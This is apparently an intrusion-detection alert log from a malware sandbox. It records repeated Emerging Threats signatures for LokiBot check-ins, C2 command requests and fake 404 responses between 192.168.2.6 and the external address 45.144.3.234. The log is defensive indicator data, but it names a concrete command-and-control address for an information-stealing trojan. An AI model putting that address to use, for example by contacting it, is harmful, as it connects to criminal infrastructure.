                                            12/02/20-11:53:48.626811TCP2025483ET TROJAN LokiBot Fake 404 Response804988545.144.3.234192.168.2.6
                                            12/02/20-11:53:48.930011TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988680192.168.2.645.144.3.234
                                            12/02/20-11:53:48.930011TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988680192.168.2.645.144.3.234
                                            12/02/20-11:53:48.930011TCP2025381ET TROJAN LokiBot Checkin4988680192.168.2.645.144.3.234
                                            12/02/20-11:53:48.930011TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988680192.168.2.645.144.3.234
                                            12/02/20-11:53:49.073543TCP2025483ET TROJAN LokiBot Fake 404 Response804988645.144.3.234192.168.2.6
                                            12/02/20-11:53:49.346886TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988780192.168.2.645.144.3.234
                                            12/02/20-11:53:49.346886TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988780192.168.2.645.144.3.234
                                            12/02/20-11:53:49.346886TCP2025381ET TROJAN LokiBot Checkin4988780192.168.2.645.144.3.234
                                            12/02/20-11:53:49.346886TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988780192.168.2.645.144.3.234
                                            12/02/20-11:53:49.473379TCP2025483ET TROJAN LokiBot Fake 404 Response804988745.144.3.234192.168.2.6
                                            12/02/20-11:53:49.720684TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988880192.168.2.645.144.3.234
                                            12/02/20-11:53:49.720684TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988880192.168.2.645.144.3.234
                                            12/02/20-11:53:49.720684TCP2025381ET TROJAN LokiBot Checkin4988880192.168.2.645.144.3.234
                                            12/02/20-11:53:49.720684TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988880192.168.2.645.144.3.234
                                            12/02/20-11:53:49.851969TCP2025483ET TROJAN LokiBot Fake 404 Response804988845.144.3.234192.168.2.6
                                            12/02/20-11:53:50.131951TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988980192.168.2.645.144.3.234
                                            12/02/20-11:53:50.131951TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988980192.168.2.645.144.3.234
                                            12/02/20-11:53:50.131951TCP2025381ET TROJAN LokiBot Checkin4988980192.168.2.645.144.3.234
                                            12/02/20-11:53:50.131951TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988980192.168.2.645.144.3.234
                                            12/02/20-11:53:50.264707TCP2025483ET TROJAN LokiBot Fake 404 Response804988945.144.3.234192.168.2.6
                                            12/02/20-11:53:50.537655TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.2.645.144.3.234
                                            12/02/20-11:53:50.537655TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.2.645.144.3.234
                                            12/02/20-11:53:50.537655TCP2025381ET TROJAN LokiBot Checkin4989080192.168.2.645.144.3.234
                                            12/02/20-11:53:50.537655TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.2.645.144.3.234
                                            12/02/20-11:53:50.667494TCP2025483ET TROJAN LokiBot Fake 404 Response804989045.144.3.234192.168.2.6
                                            12/02/20-11:53:50.981118TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989180192.168.2.645.144.3.234
                                            12/02/20-11:53:50.981118TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989180192.168.2.645.144.3.234
                                            12/02/20-11:53:50.981118TCP2025381ET TROJAN LokiBot Checkin4989180192.168.2.645.144.3.234
                                            12/02/20-11:53:50.981118TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989180192.168.2.645.144.3.234
                                            12/02/20-11:53:51.109476TCP2025483ET TROJAN LokiBot Fake 404 Response804989145.144.3.234192.168.2.6
                                            12/02/20-11:53:51.500958TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.2.645.144.3.234
                                            12/02/20-11:53:51.500958TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.2.645.144.3.234
                                            12/02/20-11:53:51.500958TCP2025381ET TROJAN LokiBot Checkin4989280192.168.2.645.144.3.234
                                            12/02/20-11:53:51.500958TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.2.645.144.3.234
                                            12/02/20-11:53:51.629140TCP2025483ET TROJAN LokiBot Fake 404 Response804989245.144.3.234192.168.2.6
                                            12/02/20-11:53:51.875501TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989480192.168.2.645.144.3.234
                                            12/02/20-11:53:51.875501TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989480192.168.2.645.144.3.234
                                            12/02/20-11:53:51.875501TCP2025381ET TROJAN LokiBot Checkin4989480192.168.2.645.144.3.234
                                            12/02/20-11:53:51.875501TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989480192.168.2.645.144.3.234
                                            12/02/20-11:53:52.001681TCP2025483ET TROJAN LokiBot Fake 404 Response804989445.144.3.234192.168.2.6
                                            12/02/20-11:53:52.299954TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989580192.168.2.645.144.3.234
                                            12/02/20-11:53:52.299954TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989580192.168.2.645.144.3.234
                                            12/02/20-11:53:52.299954TCP2025381ET TROJAN LokiBot Checkin4989580192.168.2.645.144.3.234
                                            12/02/20-11:53:52.299954TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989580192.168.2.645.144.3.234
                                            12/02/20-11:53:52.427256TCP2025483ET TROJAN LokiBot Fake 404 Response804989545.144.3.234192.168.2.6
                                            12/02/20-11:53:52.669432TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989680192.168.2.645.144.3.234
                                            12/02/20-11:53:52.669432TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989680192.168.2.645.144.3.234
                                            12/02/20-11:53:52.669432TCP2025381ET TROJAN LokiBot Checkin4989680192.168.2.645.144.3.234
                                            12/02/20-11:53:52.669432TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989680192.168.2.645.144.3.234
                                            12/02/20-11:53:52.793746TCP2025483ET TROJAN LokiBot Fake 404 Response804989645.144.3.234192.168.2.6
                                            12/02/20-11:53:53.093415TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989880192.168.2.645.144.3.234
                                            12/02/20-11:53:53.093415TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989880192.168.2.645.144.3.234
                                            12/02/20-11:53:53.093415TCP2025381ET TROJAN LokiBot Checkin4989880192.168.2.645.144.3.234
                                            12/02/20-11:53:53.093415TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989880192.168.2.645.144.3.234
                                            12/02/20-11:53:53.221691TCP2025483ET TROJAN LokiBot Fake 404 Response804989845.144.3.234192.168.2.6
                                            12/02/20-11:53:53.485192TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989980192.168.2.645.144.3.234
                                            12/02/20-11:53:53.485192TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989980192.168.2.645.144.3.234
                                            12/02/20-11:53:53.485192TCP2025381ET TROJAN LokiBot Checkin4989980192.168.2.645.144.3.234
                                            12/02/20-11:53:53.485192TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989980192.168.2.645.144.3.234
                                            12/02/20-11:53:53.608858TCP2025483ET TROJAN LokiBot Fake 404 Response804989945.144.3.234192.168.2.6
                                            12/02/20-11:53:53.899708TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990080192.168.2.645.144.3.234
                                            12/02/20-11:53:53.899708TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990080192.168.2.645.144.3.234
                                            12/02/20-11:53:53.899708TCP2025381ET TROJAN LokiBot Checkin4990080192.168.2.645.144.3.234
                                            12/02/20-11:53:53.899708TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990080192.168.2.645.144.3.234
                                            12/02/20-11:53:54.026077TCP2025483ET TROJAN LokiBot Fake 404 Response804990045.144.3.234192.168.2.6
                                            12/02/20-11:53:54.292505TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990280192.168.2.645.144.3.234
                                            12/02/20-11:53:54.292505TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990280192.168.2.645.144.3.234
                                            12/02/20-11:53:54.292505TCP2025381ET TROJAN LokiBot Checkin4990280192.168.2.645.144.3.234
                                            12/02/20-11:53:54.292505TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990280192.168.2.645.144.3.234
                                            12/02/20-11:53:54.429546TCP2025483ET TROJAN LokiBot Fake 404 Response804990245.144.3.234192.168.2.6
                                            12/02/20-11:53:54.722060TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990380192.168.2.645.144.3.234
                                            12/02/20-11:53:54.722060TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990380192.168.2.645.144.3.234
                                            12/02/20-11:53:54.722060TCP2025381ET TROJAN LokiBot Checkin4990380192.168.2.645.144.3.234
                                            12/02/20-11:53:54.722060TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990380192.168.2.645.144.3.234
                                            12/02/20-11:53:54.853922TCP2025483ET TROJAN LokiBot Fake 404 Response804990345.144.3.234192.168.2.6
                                            12/02/20-11:53:55.140344TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990480192.168.2.645.144.3.234
                                            12/02/20-11:53:55.140344TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990480192.168.2.645.144.3.234
                                            12/02/20-11:53:55.140344TCP2025381ET TROJAN LokiBot Checkin4990480192.168.2.645.144.3.234
                                            12/02/20-11:53:55.140344TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990480192.168.2.645.144.3.234
                                            12/02/20-11:53:55.270212TCP2025483ET TROJAN LokiBot Fake 404 Response804990445.144.3.234192.168.2.6
                                            12/02/20-11:53:55.522611TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990580192.168.2.645.144.3.234
                                            12/02/20-11:53:55.522611TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990580192.168.2.645.144.3.234
                                            12/02/20-11:53:55.522611TCP2025381ET TROJAN LokiBot Checkin4990580192.168.2.645.144.3.234
                                            12/02/20-11:53:55.522611TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990580192.168.2.645.144.3.234
                                            12/02/20-11:53:55.652744TCP2025483ET TROJAN LokiBot Fake 404 Response804990545.144.3.234192.168.2.6
                                            12/02/20-11:53:55.936893TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990680192.168.2.645.144.3.234
                                            12/02/20-11:53:55.936893TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990680192.168.2.645.144.3.234
                                            12/02/20-11:53:55.936893TCP2025381ET TROJAN LokiBot Checkin4990680192.168.2.645.144.3.234
                                            12/02/20-11:53:55.936893TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990680192.168.2.645.144.3.234
                                            12/02/20-11:53:56.061289TCP2025483ET TROJAN LokiBot Fake 404 Response804990645.144.3.234192.168.2.6
                                            12/02/20-11:53:56.339313TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990780192.168.2.645.144.3.234
                                            12/02/20-11:53:56.339313TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990780192.168.2.645.144.3.234
                                            12/02/20-11:53:56.339313TCP2025381ET TROJAN LokiBot Checkin4990780192.168.2.645.144.3.234
                                            12/02/20-11:53:56.339313TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990780192.168.2.645.144.3.234
                                            12/02/20-11:53:56.464036TCP2025483ET TROJAN LokiBot Fake 404 Response804990745.144.3.234192.168.2.6
                                            12/02/20-11:53:56.737421TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990880192.168.2.645.144.3.234
                                            12/02/20-11:53:56.737421TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990880192.168.2.645.144.3.234
                                            12/02/20-11:53:56.737421TCP2025381ET TROJAN LokiBot Checkin4990880192.168.2.645.144.3.234
                                            12/02/20-11:53:56.737421TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990880192.168.2.645.144.3.234
                                            12/02/20-11:53:56.865797TCP2025483ET TROJAN LokiBot Fake 404 Response804990845.144.3.234192.168.2.6
                                            12/02/20-11:53:57.123188TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990980192.168.2.645.144.3.234
                                            12/02/20-11:53:57.123188TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990980192.168.2.645.144.3.234
                                            12/02/20-11:53:57.123188TCP2025381ET TROJAN LokiBot Checkin4990980192.168.2.645.144.3.234
                                            12/02/20-11:53:57.123188TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990980192.168.2.645.144.3.234
                                            12/02/20-11:53:57.270093TCP2025483ET TROJAN LokiBot Fake 404 Response804990945.144.3.234192.168.2.6
                                            12/02/20-11:53:57.538551TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991080192.168.2.645.144.3.234
                                            12/02/20-11:53:57.538551TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991080192.168.2.645.144.3.234
                                            12/02/20-11:53:57.538551TCP2025381ET TROJAN LokiBot Checkin4991080192.168.2.645.144.3.234
                                            12/02/20-11:53:57.538551TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991080192.168.2.645.144.3.234
                                            12/02/20-11:53:57.668447TCP2025483ET TROJAN LokiBot Fake 404 Response804991045.144.3.234192.168.2.6
                                            12/02/20-11:53:57.975991TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991180192.168.2.645.144.3.234
                                            12/02/20-11:53:57.975991TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991180192.168.2.645.144.3.234
                                            12/02/20-11:53:57.975991TCP2025381ET TROJAN LokiBot Checkin4991180192.168.2.645.144.3.234
                                            12/02/20-11:53:57.975991TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991180192.168.2.645.144.3.234
                                            12/02/20-11:53:58.112592TCP2025483ET TROJAN LokiBot Fake 404 Response804991145.144.3.234192.168.2.6
                                            12/02/20-11:53:58.357650TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991280192.168.2.645.144.3.234
                                            12/02/20-11:53:58.357650TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991280192.168.2.645.144.3.234
                                            12/02/20-11:53:58.357650TCP2025381ET TROJAN LokiBot Checkin4991280192.168.2.645.144.3.234
                                            12/02/20-11:53:58.357650TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991280192.168.2.645.144.3.234
                                            12/02/20-11:53:58.484032TCP2025483ET TROJAN LokiBot Fake 404 Response804991245.144.3.234192.168.2.6
                                            12/02/20-11:53:58.743470TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991380192.168.2.645.144.3.234
                                            12/02/20-11:53:58.743470TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991380192.168.2.645.144.3.234
                                            12/02/20-11:53:58.743470TCP2025381ET TROJAN LokiBot Checkin4991380192.168.2.645.144.3.234
                                            12/02/20-11:53:58.743470TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991380192.168.2.645.144.3.234
                                            12/02/20-11:53:58.873219TCP2025483ET TROJAN LokiBot Fake 404 Response804991345.144.3.234192.168.2.6
                                            12/02/20-11:53:59.169840TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991480192.168.2.645.144.3.234
                                            12/02/20-11:53:59.169840TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991480192.168.2.645.144.3.234
                                            12/02/20-11:53:59.169840TCP2025381ET TROJAN LokiBot Checkin4991480192.168.2.645.144.3.234
                                            12/02/20-11:53:59.169840TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991480192.168.2.645.144.3.234
                                            12/02/20-11:53:59.308444TCP2025483ET TROJAN LokiBot Fake 404 Response804991445.144.3.234192.168.2.6
                                            12/02/20-11:53:59.598389TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991580192.168.2.645.144.3.234
                                            12/02/20-11:53:59.598389TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991580192.168.2.645.144.3.234
                                            12/02/20-11:53:59.598389TCP2025381ET TROJAN LokiBot Checkin4991580192.168.2.645.144.3.234
                                            12/02/20-11:53:59.598389TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991580192.168.2.645.144.3.234
                                            12/02/20-11:53:59.725656TCP2025483ET TROJAN LokiBot Fake 404 Response804991545.144.3.234192.168.2.6
                                            12/02/20-11:54:00.003774TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991680192.168.2.645.144.3.234
                                            12/02/20-11:54:00.003774TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991680192.168.2.645.144.3.234
                                            12/02/20-11:54:00.003774TCP2025381ET TROJAN LokiBot Checkin4991680192.168.2.645.144.3.234
                                            12/02/20-11:54:00.003774TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991680192.168.2.645.144.3.234
                                            12/02/20-11:54:00.132744TCP2025483ET TROJAN LokiBot Fake 404 Response804991645.144.3.234192.168.2.6
                                            12/02/20-11:54:00.415814TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991780192.168.2.645.144.3.234
                                            12/02/20-11:54:00.415814TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991780192.168.2.645.144.3.234
                                            12/02/20-11:54:00.415814TCP2025381ET TROJAN LokiBot Checkin4991780192.168.2.645.144.3.234
                                            12/02/20-11:54:00.415814TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991780192.168.2.645.144.3.234
                                            12/02/20-11:54:00.545377TCP2025483ET TROJAN LokiBot Fake 404 Response804991745.144.3.234192.168.2.6
                                            12/02/20-11:54:00.838684TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991880192.168.2.645.144.3.234
                                            12/02/20-11:54:00.838684TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991880192.168.2.645.144.3.234
                                            12/02/20-11:54:00.838684TCP2025381ET TROJAN LokiBot Checkin4991880192.168.2.645.144.3.234
                                            12/02/20-11:54:00.838684TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991880192.168.2.645.144.3.234
                                            12/02/20-11:54:00.965355TCP2025483ET TROJAN LokiBot Fake 404 Response804991845.144.3.234192.168.2.6
                                            12/02/20-11:54:01.222614TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991980192.168.2.645.144.3.234
                                            12/02/20-11:54:01.222614TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991980192.168.2.645.144.3.234
                                            12/02/20-11:54:01.222614TCP2025381ET TROJAN LokiBot Checkin4991980192.168.2.645.144.3.234
                                            12/02/20-11:54:01.222614TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991980192.168.2.645.144.3.234
                                            12/02/20-11:54:01.355035TCP2025483ET TROJAN LokiBot Fake 404 Response804991945.144.3.234192.168.2.6
                                            12/02/20-11:54:01.607790TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992080192.168.2.645.144.3.234
                                            12/02/20-11:54:01.607790TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992080192.168.2.645.144.3.234
                                            12/02/20-11:54:01.607790TCP2025381ET TROJAN LokiBot Checkin4992080192.168.2.645.144.3.234
                                            12/02/20-11:54:01.607790TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992080192.168.2.645.144.3.234
                                            12/02/20-11:54:01.748774TCP2025483ET TROJAN LokiBot Fake 404 Response804992045.144.3.234192.168.2.6
                                            12/02/20-11:54:02.042783TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992180192.168.2.645.144.3.234
                                            12/02/20-11:54:02.042783TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992180192.168.2.645.144.3.234
                                            12/02/20-11:54:02.042783TCP2025381ET TROJAN LokiBot Checkin4992180192.168.2.645.144.3.234
                                            12/02/20-11:54:02.042783TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992180192.168.2.645.144.3.234
                                            12/02/20-11:54:02.174635TCP2025483ET TROJAN LokiBot Fake 404 Response804992145.144.3.234192.168.2.6
                                            12/02/20-11:54:02.488891TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992280192.168.2.645.144.3.234
                                            12/02/20-11:54:02.488891TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992280192.168.2.645.144.3.234
                                            12/02/20-11:54:02.488891TCP2025381ET TROJAN LokiBot Checkin4992280192.168.2.645.144.3.234
                                            12/02/20-11:54:02.488891TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992280192.168.2.645.144.3.234
                                            12/02/20-11:54:02.615942TCP2025483ET TROJAN LokiBot Fake 404 Response804992245.144.3.234192.168.2.6
                                            12/02/20-11:54:02.873128TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992380192.168.2.645.144.3.234
                                            12/02/20-11:54:02.873128TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992380192.168.2.645.144.3.234
                                            12/02/20-11:54:02.873128TCP2025381ET TROJAN LokiBot Checkin4992380192.168.2.645.144.3.234
                                            12/02/20-11:54:02.873128TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992380192.168.2.645.144.3.234
                                            12/02/20-11:54:03.102366TCP2025483ET TROJAN LokiBot Fake 404 Response804992345.144.3.234192.168.2.6
                                            12/02/20-11:54:03.408857TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992480192.168.2.645.144.3.234
                                            12/02/20-11:54:03.408857TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992480192.168.2.645.144.3.234
                                            12/02/20-11:54:03.408857TCP2025381ET TROJAN LokiBot Checkin4992480192.168.2.645.144.3.234
                                            12/02/20-11:54:03.408857TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992480192.168.2.645.144.3.234
                                            12/02/20-11:54:03.534226TCP2025483ET TROJAN LokiBot Fake 404 Response804992445.144.3.234192.168.2.6
                                            12/02/20-11:54:03.821189TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992580192.168.2.645.144.3.234
                                            12/02/20-11:54:03.821189TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992580192.168.2.645.144.3.234
                                            12/02/20-11:54:03.821189TCP2025381ET TROJAN LokiBot Checkin4992580192.168.2.645.144.3.234
                                            12/02/20-11:54:03.821189TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992580192.168.2.645.144.3.234
                                            12/02/20-11:54:03.950833TCP2025483ET TROJAN LokiBot Fake 404 Response804992545.144.3.234192.168.2.6
                                            12/02/20-11:54:04.227868TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992680192.168.2.645.144.3.234
                                            12/02/20-11:54:04.227868TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992680192.168.2.645.144.3.234
                                            12/02/20-11:54:04.227868TCP2025381ET TROJAN LokiBot Checkin4992680192.168.2.645.144.3.234
                                            12/02/20-11:54:04.227868TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992680192.168.2.645.144.3.234
                                            12/02/20-11:54:04.356917TCP2025483ET TROJAN LokiBot Fake 404 Response804992645.144.3.234192.168.2.6
                                            12/02/20-11:54:04.684160TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992780192.168.2.645.144.3.234
                                            12/02/20-11:54:04.684160TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992780192.168.2.645.144.3.234
                                            12/02/20-11:54:04.684160TCP2025381ET TROJAN LokiBot Checkin4992780192.168.2.645.144.3.234
                                            12/02/20-11:54:04.684160TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992780192.168.2.645.144.3.234
                                            12/02/20-11:54:04.824449TCP2025483ET TROJAN LokiBot Fake 404 Response804992745.144.3.234192.168.2.6
                                            12/02/20-11:54:05.082819TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992880192.168.2.645.144.3.234
                                            12/02/20-11:54:05.082819TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992880192.168.2.645.144.3.234
                                            12/02/20-11:54:05.082819TCP2025381ET TROJAN LokiBot Checkin4992880192.168.2.645.144.3.234
                                            12/02/20-11:54:05.082819TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992880192.168.2.645.144.3.234
                                            12/02/20-11:54:05.223505TCP2025483ET TROJAN LokiBot Fake 404 Response804992845.144.3.234192.168.2.6
                                            12/02/20-11:54:05.706169TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992980192.168.2.645.144.3.234
                                            12/02/20-11:54:05.706169TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992980192.168.2.645.144.3.234
                                            12/02/20-11:54:05.706169TCP2025381ET TROJAN LokiBot Checkin4992980192.168.2.645.144.3.234
                                            12/02/20-11:54:05.706169TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992980192.168.2.645.144.3.234
                                            12/02/20-11:54:05.846091TCP2025483ET TROJAN LokiBot Fake 404 Response804992945.144.3.234192.168.2.6
                                            12/02/20-11:54:06.116520TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993080192.168.2.645.144.3.234
                                            12/02/20-11:54:06.116520TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993080192.168.2.645.144.3.234
                                            12/02/20-11:54:06.116520TCP2025381ET TROJAN LokiBot Checkin4993080192.168.2.645.144.3.234
                                            12/02/20-11:54:06.116520TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993080192.168.2.645.144.3.234
                                            12/02/20-11:54:06.257917TCP2025483ET TROJAN LokiBot Fake 404 Response804993045.144.3.234192.168.2.6
                                            12/02/20-11:54:06.510435TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993180192.168.2.645.144.3.234
                                            12/02/20-11:54:06.510435TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993180192.168.2.645.144.3.234
                                            12/02/20-11:54:06.510435TCP2025381ET TROJAN LokiBot Checkin4993180192.168.2.645.144.3.234
                                            12/02/20-11:54:06.510435TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993180192.168.2.645.144.3.234
                                            12/02/20-11:54:06.636279TCP2025483ET TROJAN LokiBot Fake 404 Response804993145.144.3.234192.168.2.6
                                            12/02/20-11:54:06.913352TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993280192.168.2.645.144.3.234
                                            12/02/20-11:54:06.913352TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993280192.168.2.645.144.3.234
                                            12/02/20-11:54:06.913352TCP2025381ET TROJAN LokiBot Checkin4993280192.168.2.645.144.3.234
                                            12/02/20-11:54:06.913352TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993280192.168.2.645.144.3.234
                                            12/02/20-11:54:07.043774TCP2025483ET TROJAN LokiBot Fake 404 Response804993245.144.3.234192.168.2.6
                                            12/02/20-11:54:07.374504TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993380192.168.2.645.144.3.234
                                            12/02/20-11:54:07.374504TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993380192.168.2.645.144.3.234
                                            12/02/20-11:54:07.374504TCP2025381ET TROJAN LokiBot Checkin4993380192.168.2.645.144.3.234
                                            12/02/20-11:54:07.374504TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993380192.168.2.645.144.3.234
                                            12/02/20-11:54:07.512545TCP2025483ET TROJAN LokiBot Fake 404 Response804993345.144.3.234192.168.2.6
                                            12/02/20-11:54:07.745648TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993480192.168.2.645.144.3.234
                                            12/02/20-11:54:07.745648TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993480192.168.2.645.144.3.234
                                            12/02/20-11:54:07.745648TCP2025381ET TROJAN LokiBot Checkin4993480192.168.2.645.144.3.234
                                            12/02/20-11:54:07.745648TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993480192.168.2.645.144.3.234
                                            12/02/20-11:54:07.870342TCP2025483ET TROJAN LokiBot Fake 404 Response804993445.144.3.234192.168.2.6
                                            12/02/20-11:54:08.120275TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993580192.168.2.645.144.3.234
                                            12/02/20-11:54:08.120275TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993580192.168.2.645.144.3.234
                                            12/02/20-11:54:08.120275TCP2025381ET TROJAN LokiBot Checkin4993580192.168.2.645.144.3.234
                                            12/02/20-11:54:08.120275TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993580192.168.2.645.144.3.234
                                            12/02/20-11:54:08.249251TCP2025483ET TROJAN LokiBot Fake 404 Response804993545.144.3.234192.168.2.6
                                            12/02/20-11:54:08.508028TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993680192.168.2.645.144.3.234
                                            12/02/20-11:54:08.508028TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993680192.168.2.645.144.3.234
                                            12/02/20-11:54:08.508028TCP2025381ET TROJAN LokiBot Checkin4993680192.168.2.645.144.3.234
